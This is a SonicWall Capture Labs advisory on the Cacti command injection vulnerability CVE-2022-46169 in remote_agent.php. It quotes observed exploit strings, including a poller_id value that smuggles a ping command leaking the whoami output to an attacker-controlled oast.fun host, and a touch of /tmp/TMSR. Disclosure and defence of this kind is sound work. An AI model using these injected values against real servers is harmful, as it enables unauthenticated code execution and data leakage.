Cacti Command Injection Vulnerability

By

Cacti is an open-source, web-based network monitoring, performance, fault and configuration management framework designed as a front-end application for the open-source, industry-standard data logging tool RRDtool. Cacti allows a user to poll services at predetermined intervals and graph the resulting data.

A command injection vulnerability allows an unauthenticated user to execute arbitrary code on a server running Cacti, if a specific data source was selected for any monitored device.

Cacti Command Injection Vulnerability | CVE-2022-46169
The command injection vulnerability exists in the remote_agent.php file.

As seen from the code fix, the vulnerability in Cacti exists in the way it processes a specific HTTP query associated with a particular type of polling “action” that is defined in the database. In Cacti, users can define actions to monitor a single host or “poller.” One of these poller types executes a PHP script, which expects correctly formatted return data. However, the vulnerability occurs because one of the query arguments used to execute these PHP scripts is not properly sanitized and is passed on to the execution call, resulting in command injection.

Here are some examples of exploits:


“poller_id=;ping%20-c%202%20whoami.ccsy8s32vtc0000x5nagg8rkyboyyyyyc.oast.fun”  This is attempting to inject a command into the poller_id parameter by appending a command using a semicolon (;) followed by a command to ping a domain that is controlled by the attacker. The command is also using command substitution to execute the whoami command and insert the output into the command being executed. The purpose of this command is to send a ping request to a domain controlled by the attacker that includes the result of the whoami command in the URL, which could be used to identify the username of the user running the Cacti remote agent script.

 

The part of the request touch+%2Ftmp%2FTMSR is an attempt to execute a shell command on the server, which is to create a file named TMSR in the /tmp/ directory using the touch command. This request is malicious attempt to gain unauthorized access to the server running the Cacti network monitoring system.

SonicWall Capture Labs provides protection against this threat via following signature:

  • IPS 15808:Cacti remote_agent Command Injection

Cacti has patched this vulnerability.

Threat Graph

Security News
The SonicWall Capture Labs Threat Research Team gathers, analyzes and vets cross-vector threat information from the SonicWall Capture Threat network, consisting of global devices and resources, including more than 1 million security sensors in nearly 200 countries and territories. The research team identifies, analyzes, and mitigates critical vulnerabilities and malware daily through in-depth research, which drives protection for all SonicWall customers. In addition to safeguarding networks globally, the research team supports the larger threat intelligence community by releasing weekly deep technical analyses of the most critical threats to small businesses, providing critical knowledge that defenders need to protect their networks.